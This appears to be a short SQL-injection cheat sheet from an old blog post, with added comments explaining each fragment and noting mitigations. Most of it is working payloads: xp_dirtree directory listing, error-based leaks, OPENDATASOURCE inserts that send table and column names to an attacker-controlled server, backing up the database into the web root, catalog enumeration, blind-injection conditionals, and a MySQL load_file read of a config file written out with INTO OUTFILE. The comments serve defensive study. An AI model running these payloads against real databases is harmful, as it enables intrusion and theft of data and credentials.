
Some useful techniques in sql injection [个人总结简洁版]

2004-07-16 16:57 549 查看
-- Section 1.a / 1.b (T-SQL): stage a directory listing in a scratch table, then read it back.
-- Preconditions visible here: the injected statements run under a login that can
-- CREATE TABLE and execute the extended stored procedure xp_dirtree.
-- Mitigation: connect the web application with a login that has no DDL rights and no
-- EXECUTE on extended procedures; alert when that login issues CREATE TABLE or xp_dirtree.
1.a.  create table dirs (dir varchar(100),dirid int)
-- The quoted Chinese text is the author's placeholder for the path to be listed.
insert dirs exec xp_dirtree '想获取该目录的磁盘'’
declare @dir varchar(500)
-------
-- 1.b: appends rows of dirs to @dir as 'dir:dirid|' pairs.
b.   set @dir=''
select @dir=@dir+dir+':'+ltrim(str(dirid))+'|' from dirs where dir>@dir
-- Adds an integer to the varchar value; presumably intended to surface @dir through the
-- conversion error text (TODO confirm). Returning only generic error pages to clients
-- removes that channel.
select 1+@dir
------or
-- Alternative read-back: add an identity column, then select one row at a time by position.
-- [1,2,3...] is the author's shorthand for the row counter, not T-SQL syntax.
alter table dirs add num int identity constraint num primary key
select  top  1 dir from ( select top[1,2,3...] dir,num from dirs) T order by num desc
-- Section 1.c (T-SQL): copy catalog rows to a table on another SQL Server through
-- OPENDATASOURCE, then back up the current database to a disk path.
-- 'yourip' is the author's placeholder for the receiving server; the connection string
-- targets port 1433 with the guest login and an empty password.
-- Mitigation: keep the 'Ad Hoc Distributed Queries' option disabled where the server
-- version has it, block outbound 1433 from database hosts, and alert on
-- OPENDATASOURCE / OPENROWSET issued by application logins.
c. create table tmptable ( name char(200),id int not null)
-- Sends name and id of every user table (xtype='U') to the remote tmptable.
insert into opendatasource('sqloledb','driver={sql server};server=yourip;network=sbmssocn;address=yourip,1433;uid=guest;pwd='';database=master').master.dbo.tmptable select [name],[id] from sysobjects where xtype='U' --
-- WHERE 1=2 matches no rows, so this only creates an empty table shaped like syscolumns.
select *  into [tmpcolumns]from syscolumns where 1=2
-- Sends the column names of one table to the remote tmpcolumns; the quoted id is a placeholder.
insert into opendatasource('sqloledb','driver={sql server};server=yourip;network=sbmssocn;address=yourip,1433;uid=guest;pwd='';database=master').master.dbo.tmpcolumns select name from syscolumns where id=' the id of table you wanna know'
-- Backs up the current database (db_name()) to disk. The placeholder reads "absolute path
-- of the web site", i.e. the backup file is meant to land where the web server can serve it.
-- Mitigation: the application login should hold no BACKUP DATABASE permission, the SQL Server
-- service account should have no write access to the web root, and new .bak files under
-- web directories are worth an alert.
declare @a sysname; set @a=db_name();backup database @a to disk='网站的绝对路径';--// e.g. e:/web/down.bak;--

2.
-- Section 2 (T-SQL): catalog and identity lookups. Each statement only reads metadata.
-- What they return depends on what the executing login is allowed to see, so a
-- least-privileged application login limits the result; on SQL Server versions with
-- metadata visibility restrictions a login sees only objects it has permissions on.
-- Second user table by id: inner query takes two rows, outer keeps the one with the highest id.
select top 1 name from (select top 2 name,id from sysobjects where xtype='U') T order by id desc
-- Names and ids of two user tables.
select top 2 name,id from sysobjects where xtype='U'
-- Database id for a given name, and database name for a given id.
select db_id('master')
select db_name(17)
-- Column name by ordinal position; the Chinese text is a placeholder for the table name
-- and [1,2,..] is the author's shorthand for the ordinal.
select col_name(oject_id('你要获取字段的表名'),[1,2,..])
-- Reports the database user and server login of the current session. Run as the
-- application's own login this is also a quick audit: a result such as dbo or sa
-- means the application is over-privileged.
select current_user,user,user_name(),system_user

-- Scroll cursor m over the names of all user tables (xtype='U').
-- The statements below are kept in the order the author listed them.
-- Same exposure as the sysobjects queries above: it only yields what the executing
-- login may read from the catalog.
DECLARE m  scroll CURSOR FOR
select name from sysobjects where xtype='U'
open m
DEALLOCATE m
fetch first from m
3.http://www.itlearner.com/work/hexsql.asp //a not bad link to encode charset
http://whois.webhosting.info
-- Section 4: conditional expressions in several dialects, plus a MySQL file read/write.
-- All of these reach the database only when user input is concatenated into the SQL text;
-- bound parameters keep the input as a value and none of these fragments are parsed as SQL.
-- Simple CASE expression returning '1' or '0'.
4.select case 1+1 when 1 then '1' else '0' end;
-- Fragment (the trailing ")>0" belongs to an enclosing expression not shown): iif/asc/mid
-- are Access-style functions; it tests the first character of admin.username.
select top 1 iif(asc(mid(username,1,1))>96,1,username) from admin)>0
-- MySQL IF() with STRCMP(); STRCMP returns non-zero when the strings differ.
select if(STRCMP('net0r','netor1'),'not netor','is netor');
-- MySQL: load_file() reads a server-side file and INTO OUTFILE writes the result set to disk.
-- The path is spelled with char() codes (it decodes to /home/4ngel/forum/admin/config.php),
-- so detections keyed on quoted path strings miss it; match on load_file( and INTO OUTFILE.
-- Mitigation: do not grant the FILE privilege to application accounts and set
-- secure_file_priv to restrict where the server may read and write files.
SELECT 1,1,1,1,1,load_file(char(47,104,111,109,101,47,52,110,103,101,108,47,102,111,114,117,109,47,97,100,109,105,110,47,99,111,110,102,105,103,46,112,104,112)) FROM user WHERE userid=1 into outfile 'c:/web/cfg.txt'